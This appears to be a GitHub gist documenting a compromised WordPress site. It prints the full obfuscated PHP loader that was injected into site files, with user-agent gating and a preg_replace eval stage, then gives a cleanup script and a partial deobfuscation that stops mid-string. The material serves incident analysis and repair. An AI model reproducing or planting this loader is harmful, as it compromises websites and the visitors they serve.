
@klein0r
Created July 10, 2015 19:31
Another hacked WordPress instance
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $tngmufxact = '%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x]88]5]48]32M3]317]445]212]445]43]321]464]284{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2bpreg_replace("%x2f%50%x2e%52%x29%57%x65","%x6%x7860439275ttfsqnpdov{h19275j{hnpd19275fubm%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5cc%x7825+*!*+fepdfe{h+{d%x5c%x7825c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5cvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2825r%x5c%x7878B%x5c%x782825tdz*Wsfuvso!%x5c%x7825bss%x5c%xssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+995c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x78b%x5c%x7825w:!>!%x5c%x7825)sf%x5c%x7878pmpusut)tpq256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x77f;!|!}{;)gj}l;33bq}k;opjudovg}%%x78257;utpI#7>%x5c%x7386c6f+9f5d816:+946:ce44#)zbs]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!h82f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7x7825cIjQeTQcOc%x5c%x782f#00y]#>>*4-1-bubE{h%x5c%x7j6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fub*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!mg%x5c%x7825)!gj!<2,*j%x#*<%x5c%x7825bG9}:}.}-}!#7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%c%x7825!>!2p%x5c%x7825!%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.7825Z<^2%x5c%x785c2b%x5%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%)#]341]88M4P8]37]278]2
25]24}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7867825w6<%x5c%x787fw6*CWtfs%x5c%x71#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osv825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::27u%x5c%x7825)7fmji%:8:|:7#6#)tutjyf%x5c787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%xL#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5cx5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!5)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y30fmjg}[;ldpt%x5c%x7825}K;%x5f]63]y3:]68]y76#<%x5c%x78e%x5c%xMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpu272qj%x5c%x7825)7gj6<**2qjx7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpuofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutj1]53]y6d]281]y43]78]y33]65]y31]55c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQP*3>?*2b%x5c%x7825)gpf%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsb825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x781]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x55c%x7825c*W%x5c%x7825eN+#Qi928>>%x5c%x7822:ftmbg39*56A:>25r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5q%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)f]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c,2W%x5c%x7825wN;#-Ez-1H*76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x782x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x78<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpzx5c%x7878;0]=])0#)U!%x5c%x7
827{**u%x5c%x7825-x5c%x787f%x5c%x787f%x5c%xpde:4:|:**#ppde#)tutjyx7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6PNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x786]y85]82]y76]62]y3:]84#-!OVMM*2]y3d]51]y35]274]y4:]82]ysb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FU%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#25z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7572]48y]#>m%x5c%x7825:|:*r%3:]62]y4c#<!%x5c%x7825t::!>!%x5o]s]#)fepmqyf%x5c%x7827*c%x7825zW%x5c%x7825h>EzH:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<hx5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]%162%x61%171%x5f%155%x61%160%x28%#]y76]277]y72]265]y39]274]y85]273]y6g]273]y>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#epdof%x5c%x786057ftbc%xc%x7825%x5c%x782fh%x5c%x7825ft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5cc%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]25x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x7824-%x5c%x7824-tusqpt)%x5c%56<*Y%x5c%x7825)fnbozcYufhA%4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x782!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x782x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gx5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x78!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mmx7825t2w>#]y74]273]y76]252]y%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%-111112)eobs%x5c%x7860un>qp%x5c%xeturn chr(ord($n)-1);} @error_reporting(0); x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufsgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5p%x5c%x7825mm)%x5c%x7825%%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x78%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c25!<***f%x5c%x7827,*e25j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!2985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]8<%x22%51%x29%51%x29%73", 
NULL);c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x7pd%x5c%x78256<pd%x5c%x7825w5!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x78256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277].fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x&7-n%x5c%x7825)utjm6<%x5c%x787fw6*tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]KfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x78 }s)%x5c%x7825j>1<%x5c%x7825j=6[7>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7885]256]y6g]257]y86]267]y74]275]y7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x78277825!|Z~!<##!>!2p%x5c%x78%62%x35%165%x3a%146%x21^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gp5%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c5h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x57825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#)ujojR%x5c%x7827id%x5c%x78x5c%x7878:-!%x5c%x7825tzw%x5c4%162%x5f%163%x70%154%x69%164%50%x22%134%x75c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x7842%x66%152%x66%147%x67%42%x2c%163%x7)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x782ufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~2]285]Ke]53Ld]53]Kc]55Ld]5587fw6*CW&)7gj6<.[A%x5c%x7827&6<%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%<.5%x5c%x7860hA%x5c%x7826Z6<.4%x5c%x7860hA%x5c%x7%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7]364]6]234]342]58]24]31#-%x5c%x7U,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*<~%x5c%x7824<!%x5c%x7825o:!>&& (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { 
%x782f},;#-#}+;%x5c%x7825-qpx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!c%x785c1^-%x5c%x7825r%x5c%x785c2^-%825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyfy72]265]y39]271]y83]256]y78]248]y83]256]%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%]y7d]252]y74]256#<!%x5c%x7825f!>!#]y81]273]y76]258]y6g]273]y76]271x7825z-#:#*%x5c%x7824-%x5cc%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f295c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x782x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c142%x5f%163%x74%141%x72%164") #jt0}Z;0]=]0#)2q%x5c%x7825l}S;2CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x782525)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJ5c%x7825%x5c%x787f!~!<##!>!2p%x5c%xx5c%x7825:-t%x5c%x7825)3of:opjudovg5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*dyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpj^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%oj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<-u%x5c%x7825!-#2#%x5c%x782f#%xx5c%x7825,3,j%x5c%x7825>j%x5cpd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x7824!>!tus%x5c%x7860sfqmbdf)%x86+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%f%x5c%x78604%x5c%x78223}!+!<+{e%x5#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7sut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x7824b!>!%x5c%x7825yy)#}#-#2f7#@#7%x5c%x782f7^#iubq#%x5c5%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x720QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787o)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%f2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x782zbe!
-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%$GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){r5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%xj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcx7825V<*#fopoV;hojepdoF.u860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c8297f:5297e:56-%x5c%x7878r.985:5%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x55c%x7825-#1]#-bubE{h%x5c%x7825)%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x78257-K)udfoopdXA%x5c%x7822)7gif((function_exists("%x6f%/(.*)/epreg_replacesgeocmclkg'; $wzrfkwxlic = explode(chr((297-253)),'10080,26,8123,30,7364,50,9534,56,5242,44,136,45,9176,57,4378,33,6894,36,6743,43,6303,24,2782,44,2424,32,834,21,3834,34,7156,24,5700,28,7180,25,6221,58,8758,60,7795,59,4228,24,5858,34,8184,34,6147,41,2071,20,8053,70,983,22,1123,40,9831,35,5438,49,10048,32,1214,64,5954,55,2502,26,4839,50,4745,28,5002,62,9147,29,9466,68,3451,66,7205,51,9791,40,8383,63,8662,37,5821,37,2111,50,1759,32,2886,42,8218,57,7288,48,6688,26,886,65,7061,31,1342,59,1719,40,2396,28,2697,64,2456,46,4555,49,7639,64,4944,58,9647,57,5286,47,4889,55,5728,45,1087,36,1401,24,9951,31,8604,58,8729,29,472,67,385,36,9704,62,421,51,1191,23,7529,70,0,41,8275,35,1603,23,1515,23,2761,21,85,51,1626,66,4674,37,5394,44,5487,21,1538,65,2014,57,5209,33,6279,24,2574,39,9072,48,7442,52,9898,53,855,31,723,62,1005,29,3981,69,3868,59,9233,53,2264,36,2826,60,3150,61,4504,23,785,49,6635,53,6426,37,7414,28,1890,61,6984,50,3065,29,2091,20,181,44,5333,37,3757,22,8973,34,352,33,6930,54,2300,50,3732,25,6463,70,7854,41,602,63,1450,65,9766,25,2613,51,8446,56,6844,50,951,32,3687,45,8153,31,8699,30,8345,38,9410,56,4411,43,3541,58,6009,36,3211,66,5119,28,6188,33,4276,44,9982,66,3326,65,4527,28,3391,60,288,64,7092,64,4320,58,4170,27,8310,35,7336,28,5064,55,7733,36,7703,30,9354,56,6359,67,
8548,56,9120,27,4711,34,7769,26,8878,32,9590,57,8011,42,1842,48,225,63,3779,55,8502,46,9286,68,2528,46,3956,25,4197,31,5651,49,3038,27,5147,62,1163,28,6045,70,3094,56,4252,24,3517,24,2998,40,7494,35,2210,54,9007,65,665,24,6533,61,9866,32,5567,53,1791,51,4773,66,4454,50,1034,53,5892,62,7034,27,1425,25,1278,64,6786,58,3650,37,1692,27,2928,70,41,44,7256,32,689,34,7954,57,8910,63,3599,51,5508,59,7895,59,1951,63,539,63,6327,32,6117,30,3277,49,4104,66,8818,60,5370,24,6714,29,4050,54,2161,49,6594,41,4604,70,5773,48,7599,40,2350,46,2664,33,3927,29,5620,31,6115,2'); $wutuvgawyv=substr($tngmufxact,(60303-50197),(32-25)); if (!function_exists('tttchsrlcp')) { function tttchsrlcp($smnunczuff, $tmwlxkzbmf) { $whghqcixdu = NULL; for($bpwxymtmgi=0;$bpwxymtmgi<(sizeof($smnunczuff)/2);$bpwxymtmgi++) { $whghqcixdu .= substr($tmwlxkzbmf, $smnunczuff[($bpwxymtmgi*2)],$smnunczuff[($bpwxymtmgi*2)+1]); } return $whghqcixdu; };} $lxsxadpskj="\x20\57\x2a\40\x6f\146\x6b\146\x78\163\x6f\163\x66\142\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\67\x35\55\x31\63\x38\51\x29\54\x20\143\x68\162\x28\50\x35\67\x33\55\x34\70\x31\51\x29\54\x20\164\x74\164\x63\150\x73\162\x6c\143\x70\50\x24\167\x7a\162\x66\153\x77\170\x6c\151\x63\54\x24\164\x6e\147\x6d\165\x66\170\x61\143\x74\51\x29\51\x3b\40\x2f\52\x20\142\x63\165\x75\164\x6a\161\x72\154\x69\40\x2a\57\x20"; $nfumbfnqsz=substr($tngmufxact,(66706-56593),(73-61)); $nfumbfnqsz($wutuvgawyv, $lxsxadpskj, NULL); $nfumbfnqsz=$lxsxadpskj; $nfumbfnqsz=(767-646); $tngmufxact=$nfumbfnqsz-1; ?>

klein0r commented Jul 10, 2015

Repair-Script:

<?php

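// Strips the injected loader shown above from every file under this script's directory.
//
// Scope and limits (read before running):
//  - This only removes the prepended block. It does not close whatever let the attacker
//    write to these files, and it does not look for other backdoors or newly added files.
//  - Take an offline copy of the tree first, outside the web root, so the infected state
//    is preserved for investigation and a wrong match can be undone. Do not leave backup
//    copies next to the originals: a copied config file would be served as plain text.
//  - The offsets below are specific to this one sample. A file that carries the marker
//    but has a different layout is reported and left untouched.

// Variable name the loader assigns its payload string to.
$marker = 'tngmufxact';
// First bytes of the injected block as stored on disk. Single quotes keep the
// \x61\156... escapes literal, which is how the sample spells them.
$injectedPrefix = '<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"]))';
// Where to start looking for the closing PHP tag of the injected block, where that tag
// must sit, and where the original file content begins (two bytes later).
$searchFrom = 13200;
$closingTagOffset = 13278;
$originalStart = 13280;

// SKIP_DOTS keeps the "." and ".." entries out of the walk; without it they reach
// file_get_contents() and only produce warnings.
$directory = new RecursiveDirectoryIterator(__DIR__, FilesystemIterator::SKIP_DOTS);
$iterator = new RecursiveIteratorIterator($directory);

foreach ($iterator as $filename => $cur) {
    // Only regular, readable files long enough to hold the block. Symlinks are skipped
    // so a link cannot make this script rewrite a file outside the tree.
    if ($cur->isLink() || !$cur->isFile() || !$cur->isReadable() || $cur->getSize() <= $searchFrom) {
        continue;
    }

    $contents = file_get_contents($filename);
    if ($contents === false || strpos($contents, $marker) === false) {
        continue;
    }

    // Both ends of the block have to match before anything is cut: the known first bytes
    // at offset 0 and the closing tag at the exact offset (strict comparison, so a
    // "not found" result can never be mistaken for a position).
    $matchesSample = strncmp($contents, $injectedPrefix, strlen($injectedPrefix)) === 0
        && strpos($contents, '?>', $searchFrom) === $closingTagOffset;

    if (!$matchesSample) {
        error_log("marker found but layout differs, left untouched: {$filename}");
        continue;
    }

    if (file_put_contents($filename, substr($contents, $originalStart), LOCK_EX) === false) {
        error_log("could not rewrite: {$filename}");
        continue;
    }

    // Printed only after the write succeeded, so the list is the set of cleaned files.
    echo $filename.PHP_EOL;
}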


klein0r commented Jul 10, 2015

Deobfuscated #1:

<?php

// Stage-1 gate. "anuna" is the decoded form of the escaped key "\x61\156\x75\156\x61"
// in the raw sample; the decoded second stage only runs while this key is NOT set.
if(!isset($GLOBALS["anuna"])) {
    // Lower-cased so the substring tests below are case-insensitive.
    $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
    // User-Agent contains neither "msie" nor "rv:11": set the flag, which switches the
    // second stage off for this request. In effect the payload is served only to
    // visitors whose User-Agent carries one of those two tokens, so a check from a
    // different browser or from a command-line client will not show the behaviour.
    if ((!strstr($ua, "msie")) && (!strstr($ua, "rv:11"))) {
        $GLOBALS["anuna"] = 1;
    }
}

$tngmufxact = '%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x]88]5]48]32M3]317]445]212]445]43]321]464]284{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2bpreg_replace("%x2f%50%x2e%52%x29%57%x65","%x6%x7860439275ttfsqnpdov{h19275j{hnpd19275fubm%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5cc%x7825+*!*+fepdfe{h+{d%x5c%x7825c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5cvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2825r%x5c%x7878B%x5c%x782825tdz*Wsfuvso!%x5c%x7825bss%x5c%xssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+995c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x78b%x5c%x7825w:!>!%x5c%x7825)sf%x5c%x7878pmpusut)tpq256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x77f;!|!}{;)gj}l;33bq}k;opjudovg}%%x78257;utpI#7>%x5c%x7386c6f+9f5d816:+946:ce44#)zbs]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!h82f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7x7825cIjQeTQcOc%x5c%x782f#00y]#>>*4-1-bubE{h%x5c%x7j6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fub*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!mg%x5c%x7825)!gj!<2,*j%x#*<%x5c%x7825bG9}:}.}-}!#7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%c%x7825!>!2p%x5c%x7825!%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.7825Z<^2%x5c%x785c2b%x5%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%)#]341]88M4P8]37]278]225]24}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7867825w6<%x5c%x787fw6*CWtfs%x5c%x71#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osv825s:%x5c%x785c%x5c%x7825j:.2^,%x5
c%x7825b:<!%x5c%x7825c:>%x5c%%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::27u%x5c%x7825)7fmji%:8:|:7#6#)tutjyf%x5c787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%xL#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5cx5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!5)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y30fmjg}[;ldpt%x5c%x7825}K;%x5f]63]y3:]68]y76#<%x5c%x78e%x5c%xMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpu272qj%x5c%x7825)7gj6<**2qjx7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpuofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutj1]53]y6d]281]y43]78]y33]65]y31]55c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQP*3>?*2b%x5c%x7825)gpf%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsb825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x781]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x55c%x7825c*W%x5c%x7825eN+#Qi928>>%x5c%x7822:ftmbg39*56A:>25r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5q%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)f]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c,2W%x5c%x7825wN;#-Ez-1H*76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x782x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x78<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpzx5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-x5c%x787f%x5c%x787f%x5c%xpde:4:|:**#ppde#)tutjyx7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x78246767~6<Cw6<pd%x5